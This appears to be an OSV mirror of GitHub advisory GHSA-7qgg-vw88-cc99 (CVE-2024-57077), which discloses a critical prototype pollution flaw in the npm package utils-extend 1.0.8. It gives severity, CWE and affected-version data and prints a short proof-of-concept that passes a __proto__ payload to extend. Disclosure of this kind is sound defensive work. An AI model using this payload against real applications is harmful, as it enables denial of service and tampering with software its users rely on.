GHSA-7qgg-vw88-cc99

Source

https://github.com/advisories/GHSA-7qgg-vw88-cc99

Import Source

https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/02/GHSA-7qgg-vw88-cc99/GHSA-7qgg-vw88-cc99.json

JSON Data

https://api.osv.dev/v1/vulns/GHSA-7qgg-vw88-cc99

Aliases

CVE-2024-57077

Published

2025-02-06T06:31:26Z

Modified

2025-09-03T15:22:41Z

Severity

9.1 (Critical) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H CVSS Calculator

Summary

utils-extend Prototype Pollution

Details

The latest version of utils-extend (1.0.8) is vulnerable to Prototype Pollution through the entry function(s) lib.extend. An attacker can supply a payload with Object.prototype setter to introduce or modify properties within the global prototype chain, causing denial of service (DoS) a the minimum consequence.

PoC

async function exploit() {
   const utilsextend = require(\"utils-extend\");
   const payload = JSON.parse('{\"__proto__\":{\"exploited\":true}}');
   const result = await utilsextend.extend({}, payload);
}

await exploit();

Database specific

{
    "cwe_ids": [
        "CWE-1321"
    ],
    "github_reviewed_at": "2025-02-06T23:31:52Z",
    "github_reviewed": true,
    "severity": "CRITICAL",
    "nvd_published_at": "2025-02-05T22:15:31Z"
}

References

Affected packages

npm / utils-extend

Package

Name: utils-extend; View open source insights on deps.dev
Purl: pkg:npm/utils-extend

Affected ranges

Type: SEMVER
Events: Introduced

0Unknown introduced version / All previous versions are affected

Last affected

1.0.8

Database specific

source

"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/02/GHSA-7qgg-vw88-cc99/GHSA-7qgg-vw88-cc99.json"